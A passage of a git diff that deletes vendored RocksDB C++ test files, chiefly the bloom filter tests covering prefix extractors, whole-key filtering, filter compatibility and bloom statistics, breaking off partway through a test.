-        ASSERT_GT(TestGetTickerCount(options, BLOCK_CACHE_MISS), 0);
-        ASSERT_GT(TestGetTickerCount(options, BLOCK_CACHE_HIT), 0);
-        ASSERT_GT(TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_MISS), 0);
-        // compressed doesn't have any hits since blocks are not compressed on
-        // storage
-        ASSERT_EQ(TestGetTickerCount(options, BLOCK_CACHE_COMPRESSED_HIT), 0);
-        break;
-      default:
-        FAIL();
-    }
-
-    options.create_if_missing = true;
-    DestroyAndReopen(options);
-  }
-}
-
-#endif  // ROCKSDB_LITE
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/db_bloom_filter_test.cc b/thirdparty/rocksdb/db/db_bloom_filter_test.cc
deleted file mode 100644
index e6248a0..0000000
--- a/thirdparty/rocksdb/db/db_bloom_filter_test.cc
+++ /dev/null
@@ -1,1108 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "db/db_test_util.h"
-#include "port/stack_trace.h"
-#include "rocksdb/perf_context.h"
-
-namespace rocksdb {
-
-// DB tests related to bloom filter.
-
-class DBBloomFilterTest : public DBTestBase {
- public:
-  DBBloomFilterTest() : DBTestBase("/db_bloom_filter_test") {}
-};
-
-class DBBloomFilterTestWithParam
-    : public DBTestBase,
-      public testing::WithParamInterface<std::tuple<bool, bool>> {
-  //                             public testing::WithParamInterface<bool> {
- protected:
-  bool use_block_based_filter_;
-  bool partition_filters_;
-
- public:
-  DBBloomFilterTestWithParam() : DBTestBase("/db_bloom_filter_tests") {}
-
-  ~DBBloomFilterTestWithParam() {}
-
-  void SetUp() override {
-    use_block_based_filter_ = std::get<0>(GetParam());
-    partition_filters_ = std::get<1>(GetParam());
-  }
-};
-
-// KeyMayExist can lead to a few false positives, but not false negatives.
-// To make test deterministic, use a much larger number of bits per key-20 than
-// bits in the key, so that false positives are eliminated
-TEST_P(DBBloomFilterTestWithParam, KeyMayExist) {
-  do {
-    ReadOptions ropts;
-    std::string value;
-    anon::OptionsOverride options_override;
-    options_override.filter_policy.reset(
-        NewBloomFilterPolicy(20, use_block_based_filter_));
-    options_override.partition_filters = partition_filters_;
-    options_override.metadata_block_size = 32;
-    Options options = CurrentOptions(options_override);
-    if (partition_filters_ &&
-        static_cast<BlockBasedTableOptions*>(
-            options.table_factory->GetOptions())
-                ->index_type != BlockBasedTableOptions::kTwoLevelIndexSearch) {
-      // In the current implementation partitioned filters depend on partitioned
-      // indexes
-      continue;
-    }
-    options.statistics = rocksdb::CreateDBStatistics();
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    ASSERT_TRUE(!db_->KeyMayExist(ropts, handles_[1], "a", &value));
-
-    ASSERT_OK(Put(1, "a", "b"));
-    bool value_found = false;
-    ASSERT_TRUE(
-        db_->KeyMayExist(ropts, handles_[1], "a", &value, &value_found));
-    ASSERT_TRUE(value_found);
-    ASSERT_EQ("b", value);
-
-    ASSERT_OK(Flush(1));
-    value.clear();
-
-    uint64_t numopen = TestGetTickerCount(options, NO_FILE_OPENS);
-    uint64_t cache_added = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    ASSERT_TRUE(
-        db_->KeyMayExist(ropts, handles_[1], "a", &value, &value_found));
-    ASSERT_TRUE(!value_found);
-    // assert that no new files were opened and no new blocks were
-    // read into block cache.
-    ASSERT_EQ(numopen, TestGetTickerCount(options, NO_FILE_OPENS));
-    ASSERT_EQ(cache_added, TestGetTickerCount(options, BLOCK_CACHE_ADD));
-
-    ASSERT_OK(Delete(1, "a"));
-
-    numopen = TestGetTickerCount(options, NO_FILE_OPENS);
-    cache_added = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    ASSERT_TRUE(!db_->KeyMayExist(ropts, handles_[1], "a", &value));
-    ASSERT_EQ(numopen, TestGetTickerCount(options, NO_FILE_OPENS));
-    ASSERT_EQ(cache_added, TestGetTickerCount(options, BLOCK_CACHE_ADD));
-
-    ASSERT_OK(Flush(1));
-    dbfull()->TEST_CompactRange(0, nullptr, nullptr, handles_[1],
-                                true /* disallow trivial move */);
-
-    numopen = TestGetTickerCount(options, NO_FILE_OPENS);
-    cache_added = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    ASSERT_TRUE(!db_->KeyMayExist(ropts, handles_[1], "a", &value));
-    ASSERT_EQ(numopen, TestGetTickerCount(options, NO_FILE_OPENS));
-    ASSERT_EQ(cache_added, TestGetTickerCount(options, BLOCK_CACHE_ADD));
-
-    ASSERT_OK(Delete(1, "c"));
-
-    numopen = TestGetTickerCount(options, NO_FILE_OPENS);
-    cache_added = TestGetTickerCount(options, BLOCK_CACHE_ADD);
-    ASSERT_TRUE(!db_->KeyMayExist(ropts, handles_[1], "c", &value));
-    ASSERT_EQ(numopen, TestGetTickerCount(options, NO_FILE_OPENS));
-    ASSERT_EQ(cache_added, TestGetTickerCount(options, BLOCK_CACHE_ADD));
-
-    // KeyMayExist function only checks data in block caches, which is not used
-    // by plain table format.
-  } while (
-      ChangeOptions(kSkipPlainTable | kSkipHashIndex | kSkipFIFOCompaction));
-}
-
-TEST_F(DBBloomFilterTest, GetFilterByPrefixBloom) {
-  for (bool partition_filters : {true, false}) {
-    Options options = last_options_;
-    options.prefix_extractor.reset(NewFixedPrefixTransform(8));
-    options.statistics = rocksdb::CreateDBStatistics();
-    BlockBasedTableOptions bbto;
-    bbto.filter_policy.reset(NewBloomFilterPolicy(10, false));
-    if (partition_filters) {
-      bbto.partition_filters = true;
-      bbto.index_type = BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch;
-    }
-    bbto.whole_key_filtering = false;
-    options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-    DestroyAndReopen(options);
-
-    WriteOptions wo;
-    ReadOptions ro;
-    FlushOptions fo;
-    fo.wait = true;
-    std::string value;
-
-    ASSERT_OK(dbfull()->Put(wo, "barbarbar", "foo"));
-    ASSERT_OK(dbfull()->Put(wo, "barbarbar2", "foo2"));
-    ASSERT_OK(dbfull()->Put(wo, "foofoofoo", "bar"));
-
-    dbfull()->Flush(fo);
-
-    ASSERT_EQ("foo", Get("barbarbar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 0);
-    ASSERT_EQ("foo2", Get("barbarbar2"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 0);
-    ASSERT_EQ("NOT_FOUND", Get("barbarbar3"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 0);
-
-    ASSERT_EQ("NOT_FOUND", Get("barfoofoo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-
-    ASSERT_EQ("NOT_FOUND", Get("foobarbar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 2);
-
-    ro.total_order_seek = true;
-    ASSERT_TRUE(db_->Get(ro, "foobarbar", &value).IsNotFound());
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 2);
-  }
-}
-
-TEST_F(DBBloomFilterTest, WholeKeyFilterProp) {
-  for (bool partition_filters : {true, false}) {
-    Options options = last_options_;
-    options.prefix_extractor.reset(NewFixedPrefixTransform(3));
-    options.statistics = rocksdb::CreateDBStatistics();
-
-    BlockBasedTableOptions bbto;
-    bbto.filter_policy.reset(NewBloomFilterPolicy(10, false));
-    bbto.whole_key_filtering = false;
-    if (partition_filters) {
-      bbto.partition_filters = true;
-      bbto.index_type = BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch;
-    }
-    options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-    DestroyAndReopen(options);
-
-    WriteOptions wo;
-    ReadOptions ro;
-    FlushOptions fo;
-    fo.wait = true;
-    std::string value;
-
-    ASSERT_OK(dbfull()->Put(wo, "foobar", "foo"));
-    // Needs insert some keys to make sure files are not filtered out by key
-    // ranges.
-    ASSERT_OK(dbfull()->Put(wo, "aaa", ""));
-    ASSERT_OK(dbfull()->Put(wo, "zzz", ""));
-    dbfull()->Flush(fo);
-
-    Reopen(options);
-    ASSERT_EQ("NOT_FOUND", Get("foo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 0);
-    ASSERT_EQ("NOT_FOUND", Get("bar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-    ASSERT_EQ("foo", Get("foobar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-
-    // Reopen with whole key filtering enabled and prefix extractor
-    // NULL. Bloom filter should be off for both of whole key and
-    // prefix bloom.
-    bbto.whole_key_filtering = true;
-    options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-    options.prefix_extractor.reset();
-    Reopen(options);
-
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-    ASSERT_EQ("NOT_FOUND", Get("foo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-    ASSERT_EQ("NOT_FOUND", Get("bar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-    ASSERT_EQ("foo", Get("foobar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-    // Write DB with only full key filtering.
-    ASSERT_OK(dbfull()->Put(wo, "foobar", "foo"));
-    // Needs insert some keys to make sure files are not filtered out by key
-    // ranges.
-    ASSERT_OK(dbfull()->Put(wo, "aaa", ""));
-    ASSERT_OK(dbfull()->Put(wo, "zzz", ""));
-    db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-    // Reopen with both of whole key off and prefix extractor enabled.
-    // Still no bloom filter should be used.
-    options.prefix_extractor.reset(NewFixedPrefixTransform(3));
-    bbto.whole_key_filtering = false;
-    options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-    Reopen(options);
-
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-    ASSERT_EQ("NOT_FOUND", Get("foo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-    ASSERT_EQ("NOT_FOUND", Get("bar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-    ASSERT_EQ("foo", Get("foobar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-
-    // Try to create a DB with mixed files:
-    ASSERT_OK(dbfull()->Put(wo, "foobar", "foo"));
-    // Needs insert some keys to make sure files are not filtered out by key
-    // ranges.
-    ASSERT_OK(dbfull()->Put(wo, "aaa", ""));
-    ASSERT_OK(dbfull()->Put(wo, "zzz", ""));
-    db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-
-    options.prefix_extractor.reset();
-    bbto.whole_key_filtering = true;
-    options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-    Reopen(options);
-
-    // Try to create a DB with mixed files.
-    ASSERT_OK(dbfull()->Put(wo, "barfoo", "bar"));
-    // In this case needs insert some keys to make sure files are
-    // not filtered out by key ranges.
-    ASSERT_OK(dbfull()->Put(wo, "aaa", ""));
-    ASSERT_OK(dbfull()->Put(wo, "zzz", ""));
-    Flush();
-
-    // Now we have two files:
-    // File 1: An older file with prefix bloom.
-    // File 2: A newer file with whole bloom filter.
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 1);
-    ASSERT_EQ("NOT_FOUND", Get("foo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 2);
-    ASSERT_EQ("NOT_FOUND", Get("bar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 3);
-    ASSERT_EQ("foo", Get("foobar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 4);
-    ASSERT_EQ("bar", Get("barfoo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 4);
-
-    // Reopen with the same setting: only whole key is used
-    Reopen(options);
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 4);
-    ASSERT_EQ("NOT_FOUND", Get("foo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 5);
-    ASSERT_EQ("NOT_FOUND", Get("bar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 6);
-    ASSERT_EQ("foo", Get("foobar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 7);
-    ASSERT_EQ("bar", Get("barfoo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 7);
-
-    // Restart with both filters are allowed
-    options.prefix_extractor.reset(NewFixedPrefixTransform(3));
-    bbto.whole_key_filtering = true;
-    options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-    Reopen(options);
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 7);
-    // File 1 will has it filtered out.
-    // File 2 will not, as prefix `foo` exists in the file.
-    ASSERT_EQ("NOT_FOUND", Get("foo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 8);
-    ASSERT_EQ("NOT_FOUND", Get("bar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 10);
-    ASSERT_EQ("foo", Get("foobar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 11);
-    ASSERT_EQ("bar", Get("barfoo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 11);
-
-    // Restart with only prefix bloom is allowed.
-    options.prefix_extractor.reset(NewFixedPrefixTransform(3));
-    bbto.whole_key_filtering = false;
-    options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-    Reopen(options);
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 11);
-    ASSERT_EQ("NOT_FOUND", Get("foo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 11);
-    ASSERT_EQ("NOT_FOUND", Get("bar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 12);
-    ASSERT_EQ("foo", Get("foobar"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 12);
-    ASSERT_EQ("bar", Get("barfoo"));
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 12);
-  }
-}
-
-TEST_P(DBBloomFilterTestWithParam, BloomFilter) {
-  do {
-    Options options = CurrentOptions();
-    env_->count_random_reads_ = true;
-    options.env = env_;
-    // ChangeCompactOptions() only changes compaction style, which does not
-    // trigger reset of table_factory
-    BlockBasedTableOptions table_options;
-    table_options.no_block_cache = true;
-    table_options.filter_policy.reset(
-        NewBloomFilterPolicy(10, use_block_based_filter_));
-    table_options.partition_filters = partition_filters_;
-    if (partition_filters_) {
-      table_options.index_type =
-          BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch;
-    }
-    table_options.metadata_block_size = 32;
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    // Populate multiple layers
-    const int N = 10000;
-    for (int i = 0; i < N; i++) {
-      ASSERT_OK(Put(1, Key(i), Key(i)));
-    }
-    Compact(1, "a", "z");
-    for (int i = 0; i < N; i += 100) {
-      ASSERT_OK(Put(1, Key(i), Key(i)));
-    }
-    Flush(1);
-
-    // Prevent auto compactions triggered by seeks
-    env_->delay_sstable_sync_.store(true, std::memory_order_release);
-
-    // Lookup present keys.  Should rarely read from small sstable.
-    env_->random_read_counter_.Reset();
-    for (int i = 0; i < N; i++) {
-      ASSERT_EQ(Key(i), Get(1, Key(i)));
-    }
-    int reads = env_->random_read_counter_.Read();
-    fprintf(stderr, "%d present => %d reads\n", N, reads);
-    ASSERT_GE(reads, N);
-    if (partition_filters_) {
-      // Without block cache, we read an extra partition filter per each
-      // level*read and a partition index per each read
-      ASSERT_LE(reads, 4 * N + 2 * N / 100);
-    } else {
-      ASSERT_LE(reads, N + 2 * N / 100);
-    }
-
-    // Lookup present keys.  Should rarely read from either sstable.
-    env_->random_read_counter_.Reset();
-    for (int i = 0; i < N; i++) {
-      ASSERT_EQ("NOT_FOUND", Get(1, Key(i) + ".missing"));
-    }
-    reads = env_->random_read_counter_.Read();
-    fprintf(stderr, "%d missing => %d reads\n", N, reads);
-    if (partition_filters_) {
-      // With partitioned filter we read one extra filter per level per each
-      // missed read.
-      ASSERT_LE(reads, 2 * N + 3 * N / 100);
-    } else {
-      ASSERT_LE(reads, 3 * N / 100);
-    }
-
-    env_->delay_sstable_sync_.store(false, std::memory_order_release);
-    Close();
-  } while (ChangeCompactOptions());
-}
-
-INSTANTIATE_TEST_CASE_P(DBBloomFilterTestWithParam, DBBloomFilterTestWithParam,
-                        ::testing::Values(std::make_tuple(true, false),
-                                          std::make_tuple(false, true),
-                                          std::make_tuple(false, false)));
-
-TEST_F(DBBloomFilterTest, BloomFilterRate) {
-  while (ChangeFilterOptions()) {
-    Options options = CurrentOptions();
-    options.statistics = rocksdb::CreateDBStatistics();
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    const int maxKey = 10000;
-    for (int i = 0; i < maxKey; i++) {
-      ASSERT_OK(Put(1, Key(i), Key(i)));
-    }
-    // Add a large key to make the file contain wide range
-    ASSERT_OK(Put(1, Key(maxKey + 55555), Key(maxKey + 55555)));
-    Flush(1);
-
-    // Check if they can be found
-    for (int i = 0; i < maxKey; i++) {
-      ASSERT_EQ(Key(i), Get(1, Key(i)));
-    }
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 0);
-
-    // Check if filter is useful
-    for (int i = 0; i < maxKey; i++) {
-      ASSERT_EQ("NOT_FOUND", Get(1, Key(i + 33333)));
-    }
-    ASSERT_GE(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), maxKey * 0.98);
-  }
-}
-
-TEST_F(DBBloomFilterTest, BloomFilterCompatibility) {
-  Options options = CurrentOptions();
-  options.statistics = rocksdb::CreateDBStatistics();
-  BlockBasedTableOptions table_options;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(10, true));
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  // Create with block based filter
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  const int maxKey = 10000;
-  for (int i = 0; i < maxKey; i++) {
-    ASSERT_OK(Put(1, Key(i), Key(i)));
-  }
-  ASSERT_OK(Put(1, Key(maxKey + 55555), Key(maxKey + 55555)));
-  Flush(1);
-
-  // Check db with full filter
-  table_options.filter_policy.reset(NewBloomFilterPolicy(10, false));
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  // Check if they can be found
-  for (int i = 0; i < maxKey; i++) {
-    ASSERT_EQ(Key(i), Get(1, Key(i)));
-  }
-  ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 0);
-
-  // Check db with partitioned full filter
-  table_options.partition_filters = true;
-  table_options.index_type =
-      BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch;
-  table_options.filter_policy.reset(NewBloomFilterPolicy(10, false));
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-  // Check if they can be found
-  for (int i = 0; i < maxKey; i++) {
-    ASSERT_EQ(Key(i), Get(1, Key(i)));
-  }
-  ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 0);
-}
-
-TEST_F(DBBloomFilterTest, BloomFilterReverseCompatibility) {
-  for (bool partition_filters : {true, false}) {
-    Options options = CurrentOptions();
-    options.statistics = rocksdb::CreateDBStatistics();
-    BlockBasedTableOptions table_options;
-    if (partition_filters) {
-      table_options.partition_filters = true;
-      table_options.index_type =
-          BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch;
-    }
-    table_options.filter_policy.reset(NewBloomFilterPolicy(10, false));
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-    DestroyAndReopen(options);
-
-    // Create with full filter
-    CreateAndReopenWithCF({"pikachu"}, options);
-
-    const int maxKey = 10000;
-    for (int i = 0; i < maxKey; i++) {
-      ASSERT_OK(Put(1, Key(i), Key(i)));
-    }
-    ASSERT_OK(Put(1, Key(maxKey + 55555), Key(maxKey + 55555)));
-    Flush(1);
-
-    // Check db with block_based filter
-    table_options.filter_policy.reset(NewBloomFilterPolicy(10, true));
-    options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-    ReopenWithColumnFamilies({"default", "pikachu"}, options);
-
-    // Check if they can be found
-    for (int i = 0; i < maxKey; i++) {
-      ASSERT_EQ(Key(i), Get(1, Key(i)));
-    }
-    ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 0);
-  }
-}
-
-namespace {
-// A wrapped bloom over default FilterPolicy
-class WrappedBloom : public FilterPolicy {
- public:
-  explicit WrappedBloom(int bits_per_key)
-      : filter_(NewBloomFilterPolicy(bits_per_key)), counter_(0) {}
-
-  ~WrappedBloom() { delete filter_; }
-
-  const char* Name() const override { return "WrappedRocksDbFilterPolicy"; }
-
-  void CreateFilter(const rocksdb::Slice* keys, int n,
-                    std::string* dst) const override {
-    std::unique_ptr<rocksdb::Slice[]> user_keys(new rocksdb::Slice[n]);
-    for (int i = 0; i < n; ++i) {
-      user_keys[i] = convertKey(keys[i]);
-    }
-    return filter_->CreateFilter(user_keys.get(), n, dst);
-  }
-
-  bool KeyMayMatch(const rocksdb::Slice& key,
-                   const rocksdb::Slice& filter) const override {
-    counter_++;
-    return filter_->KeyMayMatch(convertKey(key), filter);
-  }
-
-  uint32_t GetCounter() { return counter_; }
-
- private:
-  const FilterPolicy* filter_;
-  mutable uint32_t counter_;
-
-  rocksdb::Slice convertKey(const rocksdb::Slice& key) const { return key; }
-};
-}  // namespace
-
-TEST_F(DBBloomFilterTest, BloomFilterWrapper) {
-  Options options = CurrentOptions();
-  options.statistics = rocksdb::CreateDBStatistics();
-
-  BlockBasedTableOptions table_options;
-  WrappedBloom* policy = new WrappedBloom(10);
-  table_options.filter_policy.reset(policy);
-  options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-
-  CreateAndReopenWithCF({"pikachu"}, options);
-
-  const int maxKey = 10000;
-  for (int i = 0; i < maxKey; i++) {
-    ASSERT_OK(Put(1, Key(i), Key(i)));
-  }
-  // Add a large key to make the file contain wide range
-  ASSERT_OK(Put(1, Key(maxKey + 55555), Key(maxKey + 55555)));
-  ASSERT_EQ(0U, policy->GetCounter());
-  Flush(1);
-
-  // Check if they can be found
-  for (int i = 0; i < maxKey; i++) {
-    ASSERT_EQ(Key(i), Get(1, Key(i)));
-  }
-  ASSERT_EQ(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), 0);
-  ASSERT_EQ(1U * maxKey, policy->GetCounter());
-
-  // Check if filter is useful
-  for (int i = 0; i < maxKey; i++) {
-    ASSERT_EQ("NOT_FOUND", Get(1, Key(i + 33333)));
-  }
-  ASSERT_GE(TestGetTickerCount(options, BLOOM_FILTER_USEFUL), maxKey * 0.98);
-  ASSERT_EQ(2U * maxKey, policy->GetCounter());
-}
-
-class SliceTransformLimitedDomain : public SliceTransform {
-  const char* Name() const override { return "SliceTransformLimitedDomain"; }
-
-  Slice Transform(const Slice& src) const override {
-    return Slice(src.data(), 5);
-  }
-
-  bool InDomain(const Slice& src) const override {
-    // prefix will be x????
-    return src.size() >= 5 && src[0] == 'x';
-  }
-
-  bool InRange(const Slice& dst) const override {
-    // prefix will be x????
-    return dst.size() == 5 && dst[0] == 'x';
-  }
-};
-
-TEST_F(DBBloomFilterTest, PrefixExtractorFullFilter) {
-  BlockBasedTableOptions bbto;
-  // Full Filter Block
-  bbto.filter_policy.reset(rocksdb::NewBloomFilterPolicy(10, false));
-  bbto.whole_key_filtering = false;
-
-  Options options = CurrentOptions();
-  options.prefix_extractor = std::make_shared<SliceTransformLimitedDomain>();
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put("x1111_AAAA", "val1"));
-  ASSERT_OK(Put("x1112_AAAA", "val2"));
-  ASSERT_OK(Put("x1113_AAAA", "val3"));
-  ASSERT_OK(Put("x1114_AAAA", "val4"));
-  // Not in domain, wont be added to filter
-  ASSERT_OK(Put("zzzzz_AAAA", "val5"));
-
-  ASSERT_OK(Flush());
-
-  ASSERT_EQ(Get("x1111_AAAA"), "val1");
-  ASSERT_EQ(Get("x1112_AAAA"), "val2");
-  ASSERT_EQ(Get("x1113_AAAA"), "val3");
-  ASSERT_EQ(Get("x1114_AAAA"), "val4");
-  // Was not added to filter but rocksdb will try to read it from the filter
-  ASSERT_EQ(Get("zzzzz_AAAA"), "val5");
-}
-
-TEST_F(DBBloomFilterTest, PrefixExtractorBlockFilter) {
-  BlockBasedTableOptions bbto;
-  // Block Filter Block
-  bbto.filter_policy.reset(rocksdb::NewBloomFilterPolicy(10, true));
-
-  Options options = CurrentOptions();
-  options.prefix_extractor = std::make_shared<SliceTransformLimitedDomain>();
-  options.table_factory.reset(NewBlockBasedTableFactory(bbto));
-
-  DestroyAndReopen(options);
-
-  ASSERT_OK(Put("x1113_AAAA", "val3"));
-  ASSERT_OK(Put("x1114_AAAA", "val4"));
-  // Not in domain, wont be added to filter
-  ASSERT_OK(Put("zzzzz_AAAA", "val1"));
-  ASSERT_OK(Put("zzzzz_AAAB", "val2"));
-  ASSERT_OK(Put("zzzzz_AAAC", "val3"));
-  ASSERT_OK(Put("zzzzz_AAAD", "val4"));
-
-  ASSERT_OK(Flush());
-
-  std::vector<std::string> iter_res;
-  auto iter = db_->NewIterator(ReadOptions());
-  // Seek to a key that was not in Domain
-  for (iter->Seek("zzzzz_AAAA"); iter->Valid(); iter->Next()) {
-    iter_res.emplace_back(iter->value().ToString());
-  }
-
-  std::vector<std::string> expected_res = {"val1", "val2", "val3", "val4"};
-  ASSERT_EQ(iter_res, expected_res);
-  delete iter;
-}
-
-#ifndef ROCKSDB_LITE
-class BloomStatsTestWithParam
-    : public DBBloomFilterTest,
-      public testing::WithParamInterface<std::tuple<bool, bool, bool>> {
- public:
-  BloomStatsTestWithParam() {
-    use_block_table_ = std::get<0>(GetParam());
-    use_block_based_builder_ = std::get<1>(GetParam());
-    partition_filters_ = std::get<2>(GetParam());
-
-    options_.create_if_missing = true;
-    options_.prefix_extractor.reset(rocksdb::NewFixedPrefixTransform(4));
-    options_.memtable_prefix_bloom_size_ratio =
-        8.0 * 1024.0 / static_cast<double>(options_.write_buffer_size);
-    if (use_block_table_) {
-      BlockBasedTableOptions table_options;
-      table_options.hash_index_allow_collision = false;
-      if (partition_filters_) {
-        assert(!use_block_based_builder_);
-        table_options.partition_filters = partition_filters_;
-        table_options.index_type =
-            BlockBasedTableOptions::IndexType::kTwoLevelIndexSearch;
-      }
-      table_options.filter_policy.reset(
-          NewBloomFilterPolicy(10, use_block_based_builder_));
-      options_.table_factory.reset(NewBlockBasedTableFactory(table_options));
-    } else {
-      assert(!partition_filters_);  // not supported in plain table
-      PlainTableOptions table_options;
-      options_.table_factory.reset(NewPlainTableFactory(table_options));
-    }
-    options_.env = env_;
-
-    get_perf_context()->Reset();
-    DestroyAndReopen(options_);
-  }
-
-  ~BloomStatsTestWithParam() {
-    get_perf_context()->Reset();
-    Destroy(options_);
-  }
-
-  // Required if inheriting from testing::WithParamInterface<>
-  static void SetUpTestCase() {}
-  static void TearDownTestCase() {}
-
-  bool use_block_table_;
-  bool use_block_based_builder_;
-  bool partition_filters_;
-  Options options_;
-};
-
-// 1 Insert 2 K-V pairs into DB
-// 2 Call Get() for both keys - expext memtable bloom hit stat to be 2
-// 3 Call Get() for nonexisting key - expect memtable bloom miss stat to be 1
-// 4 Call Flush() to create SST
-// 5 Call Get() for both keys - expext SST bloom hit stat to be 2
-// 6 Call Get() for nonexisting key - expect SST bloom miss stat to be 1
-// Test both: block and plain SST
-TEST_P(BloomStatsTestWithParam, BloomStatsTest) {
-  std::string key1("AAAA");
-  std::string key2("RXDB");  // not in DB
-  std::string key3("ZBRA");
-  std::string value1("Value1");
-  std::string value3("Value3");
-
-  ASSERT_OK(Put(key1, value1, WriteOptions()));
-  ASSERT_OK(Put(key3, value3, WriteOptions()));
-
-  // check memtable bloom stats
-  ASSERT_EQ(value1, Get(key1));
-  ASSERT_EQ(1, get_perf_context()->bloom_memtable_hit_count);
-  ASSERT_EQ(value3, Get(key3));
-  ASSERT_EQ(2, get_perf_context()->bloom_memtable_hit_count);
-  ASSERT_EQ(0, get_perf_context()->bloom_memtable_miss_count);
-
-  ASSERT_EQ("NOT_FOUND", Get(key2));
-  ASSERT_EQ(1, get_perf_context()->bloom_memtable_miss_count);
-  ASSERT_EQ(2, get_perf_context()->bloom_memtable_hit_count);
-
-  // sanity checks
-  ASSERT_EQ(0, get_perf_context()->bloom_sst_hit_count);
